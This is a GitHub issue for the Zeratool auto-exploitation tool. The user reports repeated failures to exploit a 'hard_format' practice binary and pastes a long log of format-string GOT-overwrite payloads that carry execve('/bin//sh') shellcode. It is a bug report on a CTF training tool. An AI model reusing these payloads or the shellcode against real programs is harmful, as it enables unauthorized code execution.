Zeratool Issue about "hard_format" binary exploitation

Issue about "hard_format" binary exploitation

Open kxdkxd opened this issue 3 years ago • 0 comments
I have tried the brand new pull request on the original repo, works fine with me!

But I still have some troubles when exploting the "hard_format" binary, while the others can be exploited succesfully. Although I have run this script for dozens of times, it didn't work.

The log is pretty long:

(zeratool) aaa@aaa-ubuntu1604:~/Zeratool$ python zeratool.py challenges/hard_format
[+] Checking input type
[+] Checking pwn type...
[+] Checking for overflow pwn type...
[+] Checking for format string pwn type...
[+] Found symbolic buffer at position 0 of length 49
[+] Vulnerable path found %x_%
[+] Triggerable with STDIN : %x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x




[+] Getting binary protections
[+] Checking for flag leak
[~] Odd length string detected... Skipping
[~] Odd length string detected... Skipping
[~] Odd length string detected... Skipping
[~] Odd length string detected... Skipping
[+] Returned ,*%x_%0$08x_%1$08x_%2$08x_%3$08x_%4$08x_%5$08x8x_%22$08x_%23$08x_%24$08x_%25$08x_%26$08x_%27$08x_%28$08x_%8x_%46$08x_%47$08x



t***>*><**@b*
[~] Locating buffer stack location
aaaa_0000012c_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx



aaaa_2aa615a0_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx



aaaa_00000001_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx



aaaa_61616161_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx



[+] Found stack location at 4
[+] Binary does not have NX
[+] Overwriting GOT entry to point to shellcode
Process with PID 12828 started...
= attach 12828 12828
bin.baddr 0x08048000
Using 0x8048000
asm.bits 32
glibc.fc_offset = 0x00148
Continue until 0x08048380 using 1 bpsize
hit breakpoint at: 0x8048380
[+] Found symbolic buffer at position 0 of length 49
[+] Overwiting __gmon_start__ at 0x8049734
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'4\x97\x04\x086\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'4\x97\x04\x086\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'4\x97\x04\x086\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13007 started...
= attach 13007 13007
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'4\x97\x04\x086\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'4\x97\x04\x086\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting stdin at 0x8049760
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'`\x97\x04\x08b\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'`\x97\x04\x08b\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x97\x04\x08b\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13130 started...
= attach 13130 13130
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'`\x97\x04\x08b\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x97\x04\x08b\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting exit at 0x804974c
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'L\x97\x04\x08N\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'L\x97\x04\x08N\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'L\x97\x04\x08N\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13250 started...
= attach 13250 13250
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'L\x97\x04\x08N\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'L\x97\x04\x08N\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting printf at 0x8049744
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'D\x97\x04\x08F\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'D\x97\x04\x08F\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'D\x97\x04\x08F\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13370 started...
= attach 13370 13370
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'D\x97\x04\x08F\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'D\x97\x04\x08F\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting fgets at 0x8049748
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'H\x97\x04\x08J\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'H\x97\x04\x08J\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'H\x97\x04\x08J\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13488 started...
= attach 13488 13488
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'H\x97\x04\x08J\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'H\x97\x04\x08J\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting __libc_start_main at 0x8049750
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'P\x97\x04\x08R\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'P\x97\x04\x08R\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'P\x97\x04\x08R\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13610 started...
= attach 13610 13610
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'P\x97\x04\x08R\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'P\x97\x04\x08R\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Found symbolic buffer at position 0 of length 49
[+] Overwiting __gmon_start__ at 0x8049734
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'4\x97\x04\x086\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'4\x97\x04\x086\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13729 started...
= attach 13729 13729
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting stdin at 0x8049760
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'`\x97\x04\x08b\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'`\x97\x04\x08b\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13791 started...
= attach 13791 13791
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting exit at 0x804974c
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'L\x97\x04\x08N\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'L\x97\x04\x08N\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13853 started...
= attach 13853 13853
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting printf at 0x8049744
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'D\x97\x04\x08F\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'D\x97\x04\x08F\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13915 started...
= attach 13915 13915
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting fgets at 0x8049748
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'H\x97\x04\x08J\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'H\x97\x04\x08J\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13977 started...
= attach 13977 13977
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting __libc_start_main at 0x8049750
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'P\x97\x04\x08R\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'P\x97\x04\x08R\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14039 started...
= attach 14039 14039
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Found symbolic buffer at position 0 of length 0
[-] Value at stack offset 3 not a pointer
[+] Found symbolic buffer at position 0 of length 49
[+] Overwiting __gmon_start__ at 0x8049734
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'4\x97\x04\x086\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'4\x97\x04\x086\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14103 started...
= attach 14103 14103
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting stdin at 0x8049760
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'`\x97\x04\x08b\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'`\x97\x04\x08b\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14165 started...
= attach 14165 14165
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting exit at 0x804974c
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'L\x97\x04\x08N\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'L\x97\x04\x08N\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14227 started...
= attach 14227 14227
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting printf at 0x8049744
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'D\x97\x04\x08F\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'D\x97\x04\x08F\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14289 started...
= attach 14289 14289
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting fgets at 0x8049748
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'H\x97\x04\x08J\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'H\x97\x04\x08J\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14352 started...
= attach 14352 14352
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting __libc_start_main at 0x8049750
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'P\x97\x04\x08R\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'P\x97\x04\x08R\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14414 started...
= attach 14414 14414
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
Apr 15 '21 12:04 kxdkxd
Zeratool Zeratool copied to clipboard

Issue about "hard_format" binary exploitation

I have tried the brand new pull request on the original repo, works fine with me!

But I still have some troubles when exploting the "hard_format" binary, while the others can be exploited succesfully. Although I have run this script for dozens of times, it didn't work.

The log is pretty long:

Zeratool
Zeratool copied to clipboard
